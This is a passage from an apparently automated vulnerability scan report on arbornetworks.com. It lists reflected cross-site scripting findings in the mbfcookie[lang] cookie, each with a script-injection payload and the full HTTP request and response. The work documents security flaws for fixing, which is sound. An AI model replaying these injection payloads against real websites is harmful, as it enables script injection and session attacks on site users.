Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en4e8e4\"><script>alert(1)</script>c0ea527a00e">
...[SNIP]...

3.143. http://www.arbornetworks.com/en/meet-our-partners.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/meet-our-partners.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e5c7"><script>alert(1)</script>adb9c3d2480 was submitted in the mbfcookie[lang] cookie. This input was echoed as 8e5c7\"><script>alert(1)</script>adb9c3d2480 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/meet-our-partners.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en8e5c7"><script>alert(1)</script>adb9c3d2480; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:53:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=52ba42fdb49e26026c1037d4df0f9673; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:39 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:39 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:40 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:53:40 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en8e5c7\"><script>alert(1)</script>adb9c3d2480">
...[SNIP]...

3.144. http://www.arbornetworks.com/en/network-monitoring-security-news-events.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-monitoring-security-news-events.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83849"><script>alert(1)</script>0ce72120c8d was submitted in the mbfcookie[lang] cookie. This input was echoed as 83849\"><script>alert(1)</script>0ce72120c8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/network-monitoring-security-news-events.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en83849"><script>alert(1)</script>0ce72120c8d; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=f6bf29a4fc59f7f5053553da10a007f5; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:15 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:15 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:16 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:17 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en83849\"><script>alert(1)</script>0ce72120c8d">
...[SNIP]...

3.145. http://www.arbornetworks.com/en/network-security-experts-2.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-security-experts-2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eaac"><script>alert(1)</script>506cb8ffb11 was submitted in the mbfcookie[lang] cookie. This input was echoed as 6eaac\"><script>alert(1)</script>506cb8ffb11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/network-security-experts-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en6eaac"><script>alert(1)</script>506cb8ffb11; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:53:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=0334d60269ba7b2713cf2ec3bc3eb1a5; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:35 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:35 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:36 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:53:37 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en6eaac\"><script>alert(1)</script>506cb8ffb11">
...[SNIP]...

3.146. http://www.arbornetworks.com/en/network-security-monitoring-solutions-for-your-industry.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-security-monitoring-solutions-for-your-industry.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68ce7"><script>alert(1)</script>36f0a831d17 was submitted in the mbfcookie[lang] cookie. This input was echoed as 68ce7\"><script>alert(1)</script>36f0a831d17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/network-security-monitoring-solutions-for-your-industry.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en68ce7"><script>alert(1)</script>36f0a831d17; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:59 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=4c85c8c200e6261bcaa26b721b6bfaa8; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:00 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:00 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:01 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:01 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en68ce7\"><script>alert(1)</script>36f0a831d17">
...[SNIP]...

3.147. http://www.arbornetworks.com/en/network-security-research-2.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-security-research-2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fba46"><script>alert(1)</script>e9a751b4cd1 was submitted in the mbfcookie[lang] cookie. This input was echoed as fba46\"><script>alert(1)</script>e9a751b4cd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/network-security-research-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enfba46"><script>alert(1)</script>e9a751b4cd1; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:52:59 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=2df89d8416b69bee970701cde6d4e0ba; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:00 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:00 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:01 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:53:01 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: PartnerSale
...[SNIP]...
<meta lang="enfba46\"><script>alert(1)</script>e9a751b4cd1">
...[SNIP]...

3.148. http://www.arbornetworks.com/en/network-security-visibility-products-235.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-security-visibility-products-235.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b951"><script>alert(1)</script>d5453ad5523 was submitted in the mbfcookie[lang] cookie. This input was echoed as 6b951\"><script>alert(1)</script>d5453ad5523 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/network-security-visibility-products-235.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en6b951"><script>alert(1)</script>d5453ad5523; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:13 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=93ec880098c8903f7b6b1ba2875f8aad; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:14 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:14 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:15 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:15 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en6b951\"><script>alert(1)</script>d5453ad5523">
...[SNIP]...

3.149. http://www.arbornetworks.com/en/network-solutions-we-provide.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-solutions-we-provide.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a99e4"><script>alert(1)</script>5e86c72a29f was submitted in the mbfcookie[lang] cookie. This input was echoed as a99e4\"><script>alert(1)</script>5e86c72a29f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/network-solutions-we-provide.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ena99e4"><script>alert(1)</script>5e86c72a29f; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:16 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=7c604efe1488060ed8676eaa89a27f51; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:17 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:17 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:18 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="ena99e4\"><script>alert(1)</script>5e86c72a29f">
...[SNIP]...

3.150. http://www.arbornetworks.com/en/news-events.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/news-events.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ceac"><script>alert(1)</script>63f3f812b9a was submitted in the mbfcookie[lang] cookie. This input was echoed as 9ceac\"><script>alert(1)</script>63f3f812b9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/news-events.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en9ceac"><script>alert(1)</script>63f3f812b9a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:56:34 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=3864b6386fb87cc81c2b0c8600ee076b; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:56:34 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:56:34 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:56:35 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:56:35 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en9ceac\"><script>alert(1)</script>63f3f812b9a">
...[SNIP]...

3.151. http://www.arbornetworks.com/en/partnership-inquiry-form.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/partnership-inquiry-form.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb73d"><script>alert(1)</script>c71247202a3 was submitted in the mbfcookie[lang] cookie. This input was echoed as bb73d\"><script>alert(1)</script>c71247202a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/partnership-inquiry-form.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enbb73d"><script>alert(1)</script>c71247202a3; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:55:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=e1132c7739108d4aa136163325c8a1c5; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:55:56 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:55:56 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:55:57 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:56:52 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="enbb73d\"><script>alert(1)</script>c71247202a3">
...[SNIP]...

3.152. http://www.arbornetworks.com/en/services-network-support-maintenance-training-2.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/services-network-support-maintenance-training-2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b712"><script>alert(1)</script>d3b5d470576 was submitted in the mbfcookie[lang] cookie. This input was echoed as 1b712\"><script>alert(1)</script>d3b5d470576 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/services-network-support-maintenance-training-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en1b712"><script>alert(1)</script>d3b5d470576; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=1a10bc0dd348e32891785e5c1c7aa6e6; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:39 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:39 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:40 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:41 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en1b712\"><script>alert(1)</script>d3b5d470576">
...[SNIP]...

3.153. http://www.arbornetworks.com/en/solution-partners-4.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/solution-partners-4.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c1e4"><script>alert(1)</script>7b05d39a8bb was submitted in the mbfcookie[lang] cookie. This input was echoed as 4c1e4\"><script>alert(1)</script>7b05d39a8bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/solution-partners-4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en4c1e4"><script>alert(1)</script>7b05d39a8bb; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
